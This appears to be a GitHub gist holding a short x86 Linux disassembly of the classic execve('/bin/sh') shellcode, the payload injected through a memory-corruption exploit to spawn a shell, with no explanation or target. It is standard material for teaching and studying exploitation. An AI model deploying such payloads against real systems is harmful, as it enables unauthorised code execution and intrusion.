Skip to content

Instantly share code, notes, and snippets.

@bearice
Created March 18, 2013 15:23
Show Gist options
  • Save bearice/5187945 to your computer and use it in GitHub Desktop.
Save bearice/5187945 to your computer and use it in GitHub Desktop.
shellcode
0xbffffdc4: xor %eax,%eax
0xbffffdc6: push %eax
0xbffffdc7: push $0x68732f6e
0xbffffdcc: push $0x69622f2f
0xbffffdd1: mov %esp,%ebx
0xbffffdd3: push %eax
0xbffffdd4: push %ebx
0xbffffdd5: mov %esp,%ecx
0xbffffdd7: mov $0xb,%al
0xbffffdd9: int $0x80
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment